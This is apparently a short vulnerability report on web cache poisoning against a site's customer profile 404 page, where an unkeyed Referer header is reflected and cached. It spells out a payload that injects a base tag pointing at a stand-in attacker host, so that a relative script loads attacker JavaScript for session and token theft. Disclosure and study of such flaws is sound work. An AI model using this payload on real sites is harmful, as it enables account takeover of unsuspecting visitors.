Vulnerability Summary
PortSwigger-lab-style cache poisoning via Referer + Akamai WAF bypass → zero-interaction ATO
The endpoint https://id.brand-portal.com/customer/profile/<arbitrary> reflects the Referer request header verbatim inside an HTML 404 page. The CDN in front of the application (Akamai + Varnish) keys the cache only on the URL path — Referer is unkeyed but the response stays cached for 60 seconds.
A single unauthenticated request with Referer: <base href=https://attacker.tld> is enough to poison that URL for every visitor that follows. The cached page ends with a relative <script src="/static/main.js">. The browser parses the injected <base> tag first, rebases the script to https://attacker.tld/static/main.js, and ends up executing attacker-controlled JavaScript inside the id.brand-portal.com origin — session theft, bearer/JWT exfiltration, full account takeover.
No comments yet.
Be the first to share your thoughts
Log in to join the discussion.
Sign In
